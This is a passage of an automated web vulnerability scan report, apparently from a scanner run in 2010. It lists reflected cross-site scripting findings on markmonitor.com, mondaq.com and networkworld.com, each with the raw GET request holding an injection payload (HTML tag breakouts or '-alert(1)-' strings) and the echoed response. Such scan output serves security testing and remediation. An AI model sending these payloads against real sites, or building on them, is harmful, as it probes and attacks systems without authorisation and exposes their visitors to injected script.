This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/bji-winter2009/?3f89d"><a>b7bae97518d=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:03 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 32021 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/bji-winter2009/?3f89d"><a>b7bae97518d=1" id="campaign-form"> ...[SNIP]...
1.123. https://www.markmonitor.com/cta/cs-AAA/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.markmonitor.com
Path:
/cta/cs-AAA/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55eef"><a>a5127f15360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/cs-AAA/?55eef"><a>a5127f15360=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:04:41 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31993 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/cs-AAA/?55eef"><a>a5127f15360=1" id="campaign-form"> ...[SNIP]...
1.124. https://www.markmonitor.com/cta/cs-Deckers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.markmonitor.com
Path:
/cta/cs-Deckers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9fe8"><a>e5442ef4e20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cta/cs-Deckers/?b9fe8"><a>e5442ef4e20=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:00 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 32134 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/cs-deckers/?b9fe8"><a>e5442ef4e20=1" id="campaign-form"> ...[SNIP]...
1.125. https://www.markmonitor.com/cta/cs-wwe/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.markmonitor.com
Path:
/cta/cs-wwe/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a5c"><a>29e9f4a8d17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/cs-wwe/?d3a5c"><a>29e9f4a8d17=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:03 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31582 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/cs-wwe/?d3a5c"><a>29e9f4a8d17=1" id="campaign-form"> ...[SNIP]...
1.126. https://www.markmonitor.com/cta/wp-6steps/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.markmonitor.com
Path:
/cta/wp-6steps/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a98"><a>1460754cfb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-6steps/?41a98"><a>1460754cfb3=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:04:36 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31984 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/wp-6steps/?41a98"><a>1460754cfb3=1" id="campaign-form"> ...[SNIP]...
1.127. https://www.markmonitor.com/cta/wp-paidsearch/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.markmonitor.com
Path:
/cta/wp-paidsearch/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c193"><a>029c8521993 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-paidsearch/?3c193"><a>029c8521993=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:06 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31667 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/wp-paidsearch/?3c193"><a>029c8521993=1" id="campaign-form"> ...[SNIP]...
1.128. https://www.markmonitor.com/cta/wp-protectingbrand/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.markmonitor.com
Path:
/cta/wp-protectingbrand/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1724"><a>8367eb73f42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-protectingbrand/?d1724"><a>8367eb73f42=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:07 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 32293 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/wp-protectingbrand/?d1724"><a>8367eb73f42=1" id="campaign-form"> ...[SNIP]...
1.129. http://www.mondaq.com/article.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mondaq.com
Path:
/article.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71ad"-alert(1)-"52659712bc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article.asp?f71ad"-alert(1)-"52659712bc9=1 HTTP/1.1 Host: www.mondaq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 02:07:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Type: text/html; Charset=utf-8 Expires: Sat, 11 Dec 2010 02:07:54 GMT Set-Cookie: ASPSESSIONIDSAQCDSAT=NMLPIACBCJKCNJCCMOECPJLI; path=/ Cache-control: no-cache
<sc ...[SNIP]... <!--//begin var onArticle = 1; var hidePrint = 1; var normalPrint = 0; var printurl = "/article.asp"; var printqs = "f71ad"-alert(1)-"52659712bc9=1";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a49f3'-alert(1)-'c37851e1f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsa49f3'-alert(1)-'c37851e1f90/2007/101107-asia-registry-to-crack-down.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=295 Date: Sat, 11 Dec 2010 02:08:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 76464
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c592e'-alert(1)-'6f23b83a93b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2007c592e'-alert(1)-'6f23b83a93b/101107-asia-registry-to-crack-down.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=279 Date: Sat, 11 Dec 2010 02:08:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 76464
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7dc0'-alert(1)-'9c4eac0dedc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2007/101107-asia-registry-to-crack-down.htmlc7dc0'-alert(1)-'9c4eac0dedc HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Expires: Sat, 11 Dec 2010 02:08:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 11 Dec 2010 02:08:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: Apache=174.121.222.18.1292033311020175; path=/; expires=Mon, 10-Dec-12 02:08:31 GMT Content-Length: 74872
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c9bf'-alert(1)-'76984cd5f6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2007/101107-asia-registry-to-crack-down.html?6c9bf'-alert(1)-'76984cd5f6d=1 HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) nnCoection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=300 Date: Sat, 11 Dec 2010 02:08:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 123711
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab5e4'-alert(1)-'eb44345b11d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsab5e4'-alert(1)-'eb44345b11d/2009/043009-facebook-phishing.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=289 Date: Sat, 11 Dec 2010 02:08:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 76434
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 632d4'-alert(1)-'b49cc1f4677 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2009632d4'-alert(1)-'b49cc1f4677/043009-facebook-phishing.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=299 Date: Sat, 11 Dec 2010 02:08:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 76434
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a692'-alert(1)-'46e03c44d9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2009/043009-facebook-phishing.html8a692'-alert(1)-'46e03c44d9c HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Expires: Sat, 11 Dec 2010 02:08:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 11 Dec 2010 02:08:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: Apache=174.121.222.18.1292033313708497; path=/; expires=Mon, 10-Dec-12 02:08:33 GMT Content-Length: 74842
1.137. http://www.networkworld.com/news/2009/043009-facebook-phishing.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.networkworld.com
Path:
/news/2009/043009-facebook-phishing.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56a9a'-alert(1)-'b19cfbda894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2009/043009-facebook-phishing.html?56a9a'-alert(1)-'b19cfbda894=1 HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) nnCoection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=300 Date: Sat, 11 Dec 2010 02:08:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 123268
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f564d'-alert(1)-'34289712277 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsf564d'-alert(1)-'34289712277/2009/122409-e-book-piracy-the-publishing-industrys.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=287 Date: Sat, 11 Dec 2010 02:08:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 74905
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1123d'-alert(1)-'2f7255d0f28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/20091123d'-alert(1)-'2f7255d0f28/122409-e-book-piracy-the-publishing-industrys.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=289 Date: Sat, 11 Dec 2010 02:08:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 74905
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 780d6'-alert(1)-'060895cf3ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2009/122409-e-book-piracy-the-publishing-industrys.html780d6'-alert(1)-'060895cf3ba HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Expires: Sat, 11 Dec 2010 02:08:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 11 Dec 2010 02:08:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: Apache=174.121.222.18.1292033315119216; path=/; expires=Mon, 10-Dec-12 02:08:35 GMT Content-Length: 74905
1.141. http://www.networkworld.com/news/2009/122409-e-book-piracy-the-publishing-industrys.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb182'-alert(1)-'3f9f71bea8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2009/122409-e-book-piracy-the-publishing-industrys.html?bb182'-alert(1)-'3f9f71bea8d=1 HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) nnCoection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=281 Date: Sat, 11 Dec 2010 02:08:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 129979
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efd1d'-alert(1)-'31fddc3e4a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcastsefd1d'-alert(1)-'31fddc3e4a3/panorama/2007/05/how_can_brandjacking_threaten.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=300 Date: Sat, 11 Dec 2010 02:08:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 76497
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63889'-alert(1)-'aebabff57c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama63889'-alert(1)-'aebabff57c6/2007/05/how_can_brandjacking_threaten.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=283 Date: Sat, 11 Dec 2010 02:08:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 74905
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6d05'-alert(1)-'0402adac998 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007c6d05'-alert(1)-'0402adac998/05/how_can_brandjacking_threaten.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=282 Date: Sat, 11 Dec 2010 02:08:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 74905
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bcd2'-alert(1)-'0ece9fb4f82 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/051bcd2'-alert(1)-'0ece9fb4f82/how_can_brandjacking_threaten.html HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=277 Date: Sat, 11 Dec 2010 02:08:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 76497
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 378d7'-alert(1)-'02988ed1b9c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/05/how_can_brandjacking_threaten.html378d7'-alert(1)-'02988ed1b9c HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
